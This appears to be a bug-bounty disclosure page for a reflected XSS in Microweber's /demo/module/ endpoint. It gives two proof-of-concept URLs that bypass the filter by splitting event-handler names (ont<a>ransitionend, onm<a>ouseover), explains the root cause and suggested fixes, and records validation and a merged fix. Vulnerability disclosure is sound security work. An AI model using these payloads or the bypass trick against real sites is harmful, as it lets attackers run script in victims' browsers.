Reflected XSS on demo.microweber.org/demo/module/ in microweber/microweber

Valid

Reported on

Apr 21st 2022


Description

Reflected XSS with filter bypass on /demo/module/ using module= & style= parameters.

Proof of Concept

https://demo.microweber.org/demo/module/?module='ont<a>ransitionend=alert(1)'"tabindex=1&style=transition:outline%200.001s&id=x&data-show-ui=admin&class=x&from_url=https://demo.microweber.org

Press tab for the alert() to show up.

Okay 3 things to unpack here:

  • " and ' at various places allow breaking out of the html (root cause of the XSS)
  • ont<x>ransitionend gets sanitized to ontransitionend and bypasses the xss filter
  • style="transition:outline 1s" tabindex=1 is the setup you need to trigger a transition without a <style> tag

Took me some time to finally find a XSS payload that runs here :)

I'd suggest you do not allow breaking out of the html here, so filter ' & ". ont<x>ansitionend should be examined, this trick doesn't work in every parameter. Additionally, some js eventhandlers are allowed e.g. onunhandledrejection, you could think about a on.*= regex.

Impact

Execute Arbitrary JavaScript as the attacked user.

It's the only payload I found working, you might need to press "tab" but there is probably a paylaod that runs without user interaction.

References

We are processing your report and will contact the microweber team within 24 hours. a month ago
Finn Westendorf modified the report
a month ago
Finn Westendorf modified the report
a month ago
Finn Westendorf modified the report
a month ago
Finn Westendorf
a month ago

Researcher


https://demo.microweber.org/demo/module/?module=%27onm%3Ca%3Eouseover=alert(1)%27%22tabindex=1&style=width:100%25;height:100%25;&id=x&data-show-ui=admin&class=x&from_url=https://demo.microweber.org

So the trick actually was the onev<x>nthandler in the module parameter, the transition is not needed, e.g. above I use onmouseover. The html is very different from when a valid value of the module parameter is used.

<div class='x module module-'onmouseover=alert(1) '   tabindex="1"   style="width:100%;height:100%;"   id="x"   data-show-ui="admin"   from_url="https://demo.microweber.org"   data-type="'onmouseover=alert(1)"   parent-module="'onmouseover=alert(1)"   parent-module-id="x"  ></div>
We have contacted a member of the microweber team and are waiting to hear back a month ago
Peter Ivanov validated this vulnerability a month ago
Finn Westendorf has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on ad3928 a month ago
Peter Ivanov has been awarded the fix bounty
to join this conversation